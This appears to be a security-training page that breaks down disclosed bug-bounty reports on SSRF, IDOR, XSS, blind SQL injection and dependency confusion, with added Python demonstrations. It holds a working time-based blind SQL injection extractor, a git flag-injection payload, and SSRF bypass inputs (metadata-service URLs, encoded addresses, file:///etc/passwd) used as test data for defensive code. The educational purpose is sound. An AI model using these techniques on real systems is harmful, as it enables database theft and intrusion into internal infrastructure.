// seen in the wild
Real breaches, broken down
Theory sticks when you see it pay off. Each breakdown dissects a publicly disclosed HackerOne report - what was found, how, the impact, the fix - and links to the VR4CS lesson that teaches the skill behind it.
Shopify
2018-04-13
SSRF in Exchange leads to root access in all instances
Shopify's Exchange Marketplace let users import a store screenshot from a URL. By pointing it at the cloud metadata endpoint (169.254.169.254) and internal services, a researcher reached internal infrastructure and ultimately obtained root access across instances - the textbook impact of an unfiltered server-side fetch.
PayPal
2018-11-30
IDOR to add secondary users to any PayPal business account
A business-account API endpoint trusted a user-supplied account identifier without checking ownership. By swapping that ID, a researcher could add secondary users to other businesses' accounts - a classic Insecure Direct Object Reference. The fix is server-side authorization on every object access.
PayPal
2019-02-20
Stored XSS on paypal.com/signin via cache poisoning
By poisoning the web cache in front of PayPal's signin page, a researcher got a malicious response stored and served to everyone who loaded it - turning a caching quirk into stored cross-site scripting on one of the most sensitive pages on the internet. Shows how a reflected payload plus a shared cache equals persistent, widespread impact.
Uber
2016-07-08
Blind SQL injection on sctrack.email.uber.com.cn
Orange Tsai found that a base64-encoded parameter in an Uber marketing-email unsubscribe link was concatenated into a SQL query. With no visible output, he used time-based blind injection (sleep payloads) and a script to extract database users and schema character by character.
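What the extraction loop above actually looks like, as an added example that is not Orange Tsai's script and not code from the report: a vulnerable unsubscribe handler decodes a base64 JSON parameter and concatenates its `user_id` straight into the query, and an attacker-side loop recovers a value one character at a time using only response timing. Everything here is constructed: the in-memory SQLite tables, the row data and the function names. SQLite has no SLEEP(), so a `sleep` function is registered from Python to stand in for MySQL's; the fixed handler at the end uses a bound parameter instead of string concatenation.

```python
import base64
import json
import sqlite3
import time

DELAY = 0.05  # seconds the injected sleep() stalls a query when the condition holds


def build_db():
    """Constructed in-memory database standing in for the real backend."""
    conn = sqlite3.connect(":memory:")
    # SQLite lacks SLEEP(); register one so the payloads behave like MySQL's.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE subscribers (id INTEGER, email TEXT)")
    conn.execute("INSERT INTO subscribers VALUES (42, 'user@example.com')")
    conn.execute("CREATE TABLE users (name TEXT)")  # stands in for the DBMS's own user table
    conn.execute("INSERT INTO users VALUES ('root')")
    return conn


def unsubscribe_vulnerable(conn, p):
    """Server side: decode the base64 JSON parameter and splice user_id into SQL."""
    data = json.loads(base64.b64decode(p))
    sql = "SELECT email FROM subscribers WHERE id = " + str(data["user_id"])  # BUG: concatenation
    conn.execute(sql).fetchall()
    return "unsubscribed"  # identical response whether or not the query matched: blind


def unsubscribe_fixed(conn, p):
    """Same endpoint with a bound parameter: the value can never become SQL."""
    data = json.loads(base64.b64decode(p))
    conn.execute("SELECT email FROM subscribers WHERE id = ?", (data["user_id"],)).fetchall()
    return "unsubscribed"


def send(conn, handler, user_id_value):
    """Attacker side: wrap a payload the way the unsubscribe link encodes it and time the request."""
    p = base64.b64encode(json.dumps({"user_id": user_id_value}).encode())
    t0 = time.monotonic()
    handler(conn, p)
    return time.monotonic() - t0


def condition_true(conn, cond):
    """Timing oracle: the query stalls for DELAY only when `cond` is true."""
    payload = f"42 AND (CASE WHEN {cond} THEN sleep({DELAY}) ELSE 0 END)"
    return send(conn, unsubscribe_vulnerable, payload) >= DELAY / 2


def extract(conn, expr, max_len=32):
    """Recover the string value of a SQL expression one character at a time.

    Each character is found by binary search over printable ASCII, so it
    costs about seven requests instead of up to 95."""
    out = ""
    for pos in range(1, max_len + 1):
        if not condition_true(conn, f"length(({expr})) >= {pos}"):
            break  # ran off the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if condition_true(conn, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("db user:", extract(db, "SELECT name FROM users"))
    probe = f"42 AND (CASE WHEN 1=1 THEN sleep({DELAY}) ELSE 0 END)"
    print("fixed handler stalls?", send(db, unsubscribe_fixed, probe) >= DELAY / 2)
```

Against a real target the threshold needs headroom for network jitter (a longer sleep, or several samples per question), and the `CASE WHEN ... sleep()` shape is swapped for the dialect's own conditional delay. The defensive point is the one-line difference between the two handlers: bind the parameter and the oracle disappears.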
Starbucks
2018-03-30
Subdomain takeover via a dangling Azure CNAME
A Starbucks subdomain still had a CNAME pointing at a Microsoft Azure resource that was no longer registered. By claiming that dangling Azure name, the researcher could serve attacker content from a trusted Starbucks URL - ideal for phishing and stealing tokens passed through redirects.
PayPal
2021-02-09
RCE via dependency confusion (internal npm packages from the public registry)
Alex Birsan's landmark research: by publishing packages on the public npm registry with the same names as a company's private internal packages, and with higher version numbers, he got build systems to pull his public version instead of the internal one - executing his code inside corporate networks. The reason package management is a real attack surface.
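A check for the configuration mistake that makes the confusion possible, as an added example that is not Birsan's tooling and not PayPal's setup. npm only pins a package to a private registry when its scope is mapped in `.npmrc` (`@acme:registry=...`); an unscoped name that exists only internally is resolved against the default public registry, where anyone can publish it. The manifest, `.npmrc` contents, package names and the `INTERNAL` listing below are all constructed.

```python
import json

# Constructed sample manifest; the package names are made up.
PACKAGE_JSON = json.dumps({
    "name": "acme-checkout",
    "dependencies": {
        "express": "^4.18.2",              # genuinely public
        "acme-auth-client": "^2.1.0",      # internal, but unscoped
        "@acme/billing-sdk": "^1.4.0",     # internal, scope pinned in .npmrc below
        "@acme-labs/telemetry": "^0.3.0",  # internal, scope NOT pinned
    },
    "devDependencies": {"jest": "^29.0.0"},
})
NPMRC = """
registry=https://registry.npmjs.org/
@acme:registry=https://npm.acme.internal/
"""
# What the organisation actually publishes privately, e.g. a listing pulled
# from its private registry. Constructed for the example.
INTERNAL = {"acme-auth-client", "@acme/billing-sdk", "@acme-labs/telemetry"}


def parse_npmrc(text):
    """Return (default_registry, {scope: registry}) from .npmrc contents."""
    default, scoped = "https://registry.npmjs.org/", {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#":
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key == "registry":
            default = value
        elif key.startswith("@") and key.endswith(":registry"):
            scoped[key[: -len(":registry")]] = value
    return default, scoped


def registry_for(name, default, scoped):
    """Where npm will look for `name`: the scope's registry if mapped, else the default."""
    scope = name.split("/", 1)[0] if name.startswith("@") else None
    return scoped.get(scope, default)


def audit(package_json, npmrc, internal_names):
    """List dependencies the org believes are private but npm will fetch from the public registry."""
    manifest = json.loads(package_json)
    default, scoped = parse_npmrc(npmrc)
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            reg = registry_for(name, default, scoped)
            if name in internal_names and "registry.npmjs.org" in reg:
                fix = ("map its scope in .npmrc" if name.startswith("@")
                       else "publish it under a scope that .npmrc maps to the private registry")
                findings.append((name, spec, reg, fix))
    return findings


if __name__ == "__main__":
    for name, spec, reg, fix in audit(PACKAGE_JSON, NPMRC, INTERNAL):
        print(f"{name}@{spec}: resolves from {reg}; {fix}")
```

The same check applies to any ecosystem with a public default index and a private mirror (pip's `index-url`/`extra-index-url`, for one): enumerate what you publish privately, then verify that every one of those names is routed to the private source by configuration rather than by hope.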
GitLab
2019-09-19
Git flag injection: local file overwrite to remote code execution
User-controlled input was passed to a git command without separating options from arguments, letting a researcher inject git flags. That primitive enabled writing an arbitrary local file, which was escalated to remote code execution on GitLab infrastructure - a great lesson in argument injection.
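The primitive in miniature, as an added example that is not GitLab's code and not the report's exact payload: an argv builder that drops the user's string where git still parses options, beside one that validates the string as a ref name and then tells git where options end. The `--output=/tmp/pwned` value is an illustrative flag (git log accepts `--output=<file>`), and the validation rules are a subset of git's `check-ref-format` rules implemented here for the example. `--end-of-options` needs Git 2.24 or later.

```python
import re


def git_argv_vulnerable(subcommand, ref):
    """What the vulnerable pattern effectively does: the user's string lands where
    git still parses options, so '--output=/tmp/x' is read as a flag, not a ref."""
    return ["git", subcommand, ref]


def is_plausible_ref(ref):
    """Reject anything that could not be a ref name (subset of git's check-ref-format
    rules, implemented here for the example).

    The first test is the one that stops flag injection: refs never start with '-'.
    The rest keep '..', '@{', control characters and other special syntax out."""
    if not ref or ref.startswith("-"):
        return False
    if ref.startswith("/") or ref.endswith("/") or ref.endswith(".") or ref == "@":
        return False
    if "//" in ref or ".." in ref or "@{" in ref:
        return False
    if re.search(r"[\x00-\x20\x7f~^:?*\[\\]", ref):
        return False
    return all(not part.startswith(".") and not part.endswith(".lock")
               for part in ref.split("/"))


def rev_argv(subcommand, ref, *opts):
    """argv for a command that takes a revision. Validate first; then --end-of-options
    (Git 2.24+) tells git nothing after it is a flag. A plain '--' would not do here:
    after '--', git log treats the word as a pathspec, not a revision."""
    if not is_plausible_ref(ref):
        raise ValueError(f"refused ref {ref!r}")
    return ["git", subcommand, *opts, "--end-of-options", ref]


def path_argv(subcommand, path, *opts):
    """argv for a command that takes a pathspec; '--' is the right separator there."""
    if "\x00" in path:
        raise ValueError("NUL in path")
    return ["git", subcommand, *opts, "--", path]


if __name__ == "__main__":
    evil = "--output=/tmp/pwned"  # git log honours --output=<file>: the local file write
    print("vulnerable:", git_argv_vulnerable("log", evil))
    try:
        rev_argv("log", evil, "-1")
    except ValueError as e:
        print("fixed:", e)
    print("fixed:", rev_argv("log", "feature/login-fix", "-1"))
    print("path: ", path_argv("log", "-p"))
```

Validation is the layer that holds on any git version; the separator is cheap insurance on top. Passing argv as a list (never a shell string) is assumed throughout, otherwise shell metacharacters are a second, separate injection.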
Pornhub
2018-06-01
IDOR lets any user delete others' photos and albums
An album/photo deletion endpoint acted on an object ID without verifying the requester owned it. Supplying someone else's ID let an attacker delete their media - a destructive IDOR, and a reminder that authorization must be checked on writes and deletes, not just reads.
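The missing check behind both the PayPal secondary-user bug and this deletion bug, and the fix, as an added example that is not either company's code. The in-memory store, the user names and account/album IDs, and the function names are all constructed for illustration.

```python
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller does not own the object they reference."""


@dataclass
class BusinessAccount:
    account_id: str
    owner: str
    secondary_users: list = field(default_factory=list)


@dataclass
class Album:
    album_id: str
    owner: str
    photos: list = field(default_factory=list)


# Constructed sample data: two business accounts and two photo albums.
ACCOUNTS = {
    "acct-1001": BusinessAccount("acct-1001", owner="alice"),
    "acct-1002": BusinessAccount("acct-1002", owner="bob"),
}
ALBUMS = {
    "album-7": Album("album-7", owner="carol", photos=["a.jpg", "b.jpg"]),
    "album-8": Album("album-8", owner="dave", photos=["c.jpg"]),
}


# --- Vulnerable: the endpoint trusts the ID the client sent ----------------
def add_secondary_user_vulnerable(caller, account_id, new_user):
    """Looks the account up by the supplied ID and never asks who owns it, so
    any authenticated user can pass another business's account_id."""
    account = ACCOUNTS[account_id]
    account.secondary_users.append(new_user)
    return list(account.secondary_users)


# --- Fixed: one authorization helper, used on reads, writes and deletes -----
def load_owned(store, object_id, caller):
    """Fetch an object and verify that `caller` owns it.

    Returning the same error for 'missing' and 'not yours' keeps the endpoint
    from becoming an oracle for which IDs exist."""
    obj = store.get(object_id)
    if obj is None or obj.owner != caller:
        raise Forbidden(f"{caller} may not access {object_id}")
    return obj


def add_secondary_user(caller, account_id, new_user):
    account = load_owned(ACCOUNTS, account_id, caller)
    if new_user not in account.secondary_users:
        account.secondary_users.append(new_user)
    return list(account.secondary_users)


def delete_album(caller, album_id):
    """Destructive IDOR: the ownership check matters on deletes too."""
    load_owned(ALBUMS, album_id, caller)  # raises before anything is removed
    del ALBUMS[album_id]
    return album_id


if __name__ == "__main__":
    # mallory is a legitimate user of the service targeting alice's business.
    print("vulnerable:", add_secondary_user_vulnerable("mallory", "acct-1001", "mallory"))
    try:
        add_secondary_user("mallory", "acct-1002", "mallory")
    except Forbidden as e:
        print("fixed:", e)
    try:
        delete_album("mallory", "album-8")
    except Forbidden as e:
        print("fixed:", e)
```

The shape to look for in review is an object fetched by client-supplied ID with no reference to the session user anywhere on the path to the write. Centralising the check in one loader, and making every handler go through it, is what stops the next endpoint from repeating the bug.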
Lyft
2020-06-01
My expense report resulted in an SSRF on Lyft
A receipt/expense feature fetched a user-supplied URL server-side. By pointing it at internal addresses, a researcher turned an innocuous 'upload your receipt' flow into a window onto Lyft's internal network - proving how everyday URL-fetching features become SSRF.
Dropbox
2020-08-01
SSRF at HelloSign leads to AWS private key disclosure
An SSRF in app.hellosign.com let a researcher reach the EC2 instance metadata service (169.254.169.254) and read temporary AWS credentials - the exact attack pattern behind some of the largest cloud breaches.
Valve
2019-02-15
RCE on the Steam client via a Server Info buffer overflow
A malformed game-server 'Server Info' response overflowed a fixed-size buffer in the Steam client, giving an attacker control of execution - a reminder that memory-safety bugs in native clients are still very real RCE.
Valve
2018-11-01
XSS in the Steam React chat client
User-controlled content rendered in Steam's chat client executed as script, showing that XSS isn't just a browser problem - it bites desktop apps built on embedded web views (Electron, CEF) too, where the impact can reach the local system.
Reddit
2022-04-01
One-click account hijack via Sign in with Apple on Reddit
A flaw in how the Apple sign-in flow was handled allowed an attacker to take over accounts of users who used 'Sign in with Apple' - a sharp lesson in how third-party authentication flows can break access control.
GitLab
2020-04-01
SSRF via project import (remote_attachment_url)
GitLab's project-import feature fetched a remote attachment URL server-side without sufficient validation, enabling SSRF against internal services - a great example of how import/integration features expand the attack surface.
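What a hardened server-side fetch has to do, covering the Shopify, Lyft, HelloSign and GitLab entries above, as an added example that is not code from any of those services. The resolver and the HTTP client are injected so the block runs offline; the `FAKE_DNS` table, the fake open redirect and the response bodies are constructed. In a real service the resolver is `socket.getaddrinfo` and the client is one that connects to the already-validated IP and does not follow redirects on its own.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

# Hostnames cloud metadata services answer to; block them by name as well as by IP.
METADATA_HOSTNAMES = {"metadata.google.internal", "metadata", "instance-data"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


class BlockedTarget(Exception):
    pass


def is_internal(ip):
    """True for any address the server must never connect to on a user's behalf:
    loopback, RFC 1918, link-local (169.254.0.0/16 holds the metadata service),
    carrier-grade NAT, unspecified, and their IPv4-mapped IPv6 forms."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still 169.254.169.254
    return not ip.is_global


def validate_target(url, resolver):
    """Parse `url`, resolve its host, and return (host, port, ip) or raise BlockedTarget.

    The resolved IP is returned so the caller connects to exactly that address
    instead of resolving again later (a second lookup reopens DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise BlockedTarget(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise BlockedTarget("no host in URL")
    if host.lower().rstrip(".") in METADATA_HOSTNAMES:
        raise BlockedTarget(f"metadata hostname: {host}")
    try:
        ip = ipaddress.ip_address(host)  # literal address in the URL
    except ValueError:
        ip = ipaddress.ip_address(resolver(host))  # a name: resolve it here, once
    if is_internal(ip):
        raise BlockedTarget(f"{host} -> {ip} is not a public address")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return host, port, str(ip)


def fetch_guarded(url, resolver, http_get, max_hops=3):
    """Fetch `url`, re-validating every redirect hop.

    `http_get(url, ip)` must connect to `ip`, request `url`, and return
    (status, headers, body) WITHOUT following redirects itself; otherwise a
    public host can bounce the server straight to 169.254.169.254."""
    for _ in range(max_hops + 1):
        host, port, ip = validate_target(url, resolver)
        status, headers, body = http_get(url, ip)
        if status in REDIRECT_CODES and "location" in headers:
            url = urljoin(url, headers["location"])  # Location may be relative
            continue
        return status, body
    raise BlockedTarget("too many redirects")


# --- Constructed stand-ins so the example runs offline ----------------------
FAKE_DNS = {
    "images.example.com": "93.184.216.34",
    "redirector.example.net": "151.101.1.69",
    "metadata.google.internal": "169.254.169.254",
    "localhost": "127.0.0.1",
    "2852039166": "169.254.169.254",  # decimal form; a real resolver parses it this way
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise BlockedTarget(f"cannot resolve {host}")
    return FAKE_DNS[host]


def fake_http_get(url, ip):
    """Pretend network: the redirector is an open redirect that bounces to the metadata service."""
    if url.startswith("http://redirector.example.net/"):
        return 302, {"location": "http://169.254.169.254/latest/meta-data/"}, b""
    if ip == "169.254.169.254":
        return 200, {}, b"<instance metadata: this is where temporary credentials would be>"
    return 200, {}, b"<png bytes>"


if __name__ == "__main__":
    print(fetch_guarded("https://images.example.com/shot.png", fake_resolver, fake_http_get))
    for bad in ("http://169.254.169.254/latest/meta-data/", "http://[::ffff:169.254.169.254]/",
                "http://2852039166/", "http://localhost:6379/", "file:///etc/passwd",
                "http://redirector.example.net/go"):
        try:
            fetch_guarded(bad, fake_resolver, fake_http_get)
        except BlockedTarget as e:
            print("blocked:", bad, "->", e)
```

Two things a denylist of `169.254.169.254` alone misses are both exercised here: alternate spellings of the address (IPv4-mapped IPv6, decimal) and a redirect from a perfectly public host. Where the platform offers it, requiring the metadata service's own header or token (IMDSv2 on AWS, `Metadata-Flavor: Google` on GCP) is the complementary control on the instance side.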